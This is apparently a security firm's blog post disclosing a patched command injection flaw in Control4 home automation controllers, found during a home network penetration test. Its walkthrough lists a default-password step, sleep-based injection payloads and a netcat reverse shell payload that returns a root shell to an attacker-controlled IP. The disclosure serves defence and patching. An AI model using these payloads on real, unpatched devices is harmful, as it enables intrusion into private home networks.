
Support
Aon’s Cyber Secure Select offers products and services that help protect the assets of executives, high-net-worth individuals, and their families. The Executive Vulnerability Assessment is a personalized security vulnerability evaluation meant to assess and improve an individual’s security posture. Continuing our APT X series, this blog post provides a small insight into what happens behind the scenes during the home network penetration testing phase of an Executive Vulnerability Assessment by demonstrating what a real-world Advanced Persistent Threat attack against an individual might look like. This includes the details of a zero-day vulnerability discovered and leveraged during an actual assessment.
Executive Vulnerability Assessments help our clients better understand their personal attack surface. Ultimately, this helps our clients protect themselves against targeted attacks that may lead to the unauthorized disclosure of sensitive personal or corporate information that may be accessible from an executive’s home network.
In this type of engagement, the initial foothold within the network of a high-net-worth individual is often obtained by targeting devices used by their family members. Online reconnaissance is performed to identify the types of technology the family may utilize followed by the deployment of some preliminary payloads to improve situational awareness of the victim’s environment, prior to sending more complex payloads. Social engineering is the primary technique that helps deliver these payloads to the victim(s) and, upon successful execution, an initial foothold is established within a home network. In some cases, wireless attacks are viable and provide an easy initial foothold within the home network as well.
During the course of an engagement last summer after establishing an initial foothold within the executive’s network, we discovered a zero-day vulnerability affecting Control4 home automation systems running firmware versions prior to 3.2.0, such as the EA-1 and EA-3 Entertainment and Automation Controller devices. This vulnerability presented the attacker with remote code execution capabilities as the root user on the underlying operating system. The issue was disclosed to Control4, who responded that they were already aware of the issue and a fix was currently in beta. Nevertheless, they thanked us for the report. Control4 has since informed us that the vulnerability has been remediated in firmware version 3.2.0, released in October 2020. Neither Aon nor Control4 are aware of any exploitation of this vulnerability in the wild, and we would like to commend Control4 for quickly patching the issue. Users of affected systems are advised to contact a certified Control4 dealer to arrange for a firmware update. If this is not possible, we recommend placing affected devices in a separate network segment that is isolated from high-value devices.
Vulnerabilities in entertainment systems and other IoT devices can often yield a potent foothold within a home network. In this case, we utilized this vulnerability, as well as a few others, to establish long-term persistence within multiple hosts inside the network.
Due to the increasing prevalence of IoT devices, it becomes critically important for individuals to implement positive security practices in their own households. The following non-exhaustive list contains some suggestions:
The following section provides in-depth technical details of the remote code execution vulnerability discovered during the assessment.
Support
Control4 Entertainment and Automation Controller devices such as the EA-1 and EA-3 have a management interface implemented as a web application. This management interface provides a feature that allows authenticated administrators to view the device’s log files. The log retrieval functionality in firmware versions prior to 3.2.0 is vulnerable to remote code execution via command injection. The following steps describe how to reproduce this vulnerability on the affected devices.
1. Open the device’s administrative interface in a web browser and login as the System Admin user.
2. The System Admin password was not initially known during this assessment, but the targeted device still had the default password set for that account. This credential can be found at this public site: http://open-sez.me/passwd-control4.htm
3. After signing in, the Home screen will be displayed. Click on System Manager.
4. In the System Manager screen, click on a device under Discovered Devices.
5. After selecting a discovered device, click on Logging.
6. Under Logging, click on the name of a log file to retrieve. In this case, lighttpd was selected.
7. The following page will be displayed with an error message indicating that the /var/log/lighthttpd.log file does not exist.
8. Using a proxy tool such as the Burp Suite, examine the HTTP request made to obtain the lighttpd.log file and the error message returned in the response. The error message discloses the operating system command that was executed in order to retrieve the lighttpd.log file.
9. Using Burp Suite, manipulate the previous request to inject a call to the sleep command with a duration of 6 seconds and check the request response time. The injected payload in this case was ‘&sleep${IFS}6&’.
10. In order to confirm that the sleep command successfully executed, manipulate the same request again but this time change the sleep duration to 7 seconds. The response time should be approximately 7 seconds as seen in the screenshot below. The injected payload in this case was ‘&sleep${IFS}7&’.
11. For a full remote shell as the root user, use the following payload replacing IP_ADDRESS with the public IP address of a server you control, which has a netcat listener running on port 4444. The injected payload should look like the following:
'&nc${IFS}IP_ADDRESS${IFS}4444${IFS}-e${IFS}${SHELL:0:1}bin${SHELL:0:1}sh&'
Note that the same process applies to obtain RCE on Control4 EA-1 devices using the same firmware version.
Capability Overview
Cyber Resilience
Product / Service
Penetration Testing Services
About Cyber Solutions:
Aon’s Cyber Solutions offers holistic cyber risk management, unsurpassed investigative skills, and proprietary technologies to help clients uncover and quantify cyber risks, protect critical assets, and recover from cyber incidents.
General Disclaimer
This material has been prepared for informational purposes only and should not be relied on for any other purpose. You should consult with your own professional advisors or IT specialists before implementing any recommendation, following any of the steps or guidance provided herein. Although we endeavor to provide accurate and timely information and use sources that we consider reliable, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future.
Terms of Use
The contents herein may not be reproduced, reused, reprinted or redistributed without the expressed written consent of Aon, unless otherwise authorized by Aon. To use information contained herein, please write to our team.
Our Better Being podcast series, hosted by Aon Chief Wellbeing Officer Rachel Fellowes, explores wellbeing strategies and resilience. This season we cover human sustainability, kindness in the workplace, how to measure wellbeing, managing grief and more.
Expert Views on Today's Risk Capital and Human Capital Issues
Expert Views on Today's Risk Capital and Human Capital Issues
Expert Views on Today's Risk Capital and Human Capital Issues
The construction industry is under pressure from interconnected risks and notable macroeconomic developments. Learn how your organization can benefit from construction insurance and risk management.
Stay in the loop on today's most pressing cyber security matters.
Our Cyber Resilience collection gives you access to Aon’s latest insights on the evolving landscape of cyber threats and risk mitigation measures. Reach out to our experts to discuss how to make the right decisions to strengthen your organization’s cyber resilience.
Our Employee Wellbeing collection gives you access to the latest insights from Aon's human capital team. You can also reach out to the team at any time for assistance with your employee wellbeing needs.
Explore Aon's latest environmental social and governance (ESG) insights.
Our Global Insurance Market Insights highlight insurance market trends across pricing, capacity, underwriting, limits, deductibles and coverages.
How do the top risks on business leaders’ minds differ by region and how can these risks be mitigated? Explore the regional results to learn more.
Our Human Capital Analytics collection gives you access to the latest insights from Aon's human capital team. Contact us to learn how Aon’s analytics capabilities helps organizations make better workforce decisions.
Explore our hand-picked insights for human resources professionals.
Our Workforce Collection provides access to the latest insights from Aon’s Human Capital team on topics ranging from health and benefits, retirement and talent practices. You can reach out to our team at any time to learn how we can help address emerging workforce challenges.
Our Mergers and Acquisitions (M&A) collection gives you access to the latest insights from Aon's thought leaders to help dealmakers make better decisions. Explore our latest insights and reach out to the team at any time for assistance with transaction challenges and opportunities.
How do businesses navigate their way through new forms of volatility and make decisions that protect and grow their organizations?
Our Parametric Insurance Collection provides ways your organization can benefit from this simple, straightforward and fast-paying risk transfer solution. Reach out to learn how we can help you make better decisions to manage your catastrophe exposures and near-term volatility.
Our Pay Transparency and Equity collection gives you access to the latest insights from Aon's human capital team on topics ranging from pay equity to diversity, equity and inclusion. Contact us to learn how we can help your organization address these issues.
Forecasters are predicting an extremely active 2024 Atlantic hurricane season. Take measures to build resilience to mitigate risk for hurricane-prone properties.
Our Technology Collection provides access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities of technology. Reach out to the team to learn how we can help you use technology to make better decisions for the future.
Trade, technology, weather and workforce stability are the central forces in today’s risk landscape.
Our Trade Collection gives you access to the latest insights from Aon's thought leaders on navigating the evolving risks and opportunities for international business. Reach out to our team to understand how to make better decisions around macro trends and why they matter to businesses.
With a changing climate, organizations in all sectors will need to protect their people and physical assets, reduce their carbon footprint, and invest in new solutions to thrive. Our Weather Collection provides you with critical insights to be prepared.
Our Workforce Resilience collection gives you access to the latest insights from Aon's Human Capital team. You can reach out to the team at any time for questions about how we can assess gaps and help build a more resilience workforce.
Cyber Labs 3 mins
This client alert provides an overview of the current global IT outage that is related to a CrowdStrike update. We provide an overview of CrowdStrike's response and guidance, and Aon Cyber Solutions' recommendations for affected clients.
Cyber Labs 8 mins
Stroz Friedberg Digital Forensics and Incident Response has observed an uptick in SIM swapping across multiple industries, with several recent incidents targeting crypto and crypto-adjacent companies.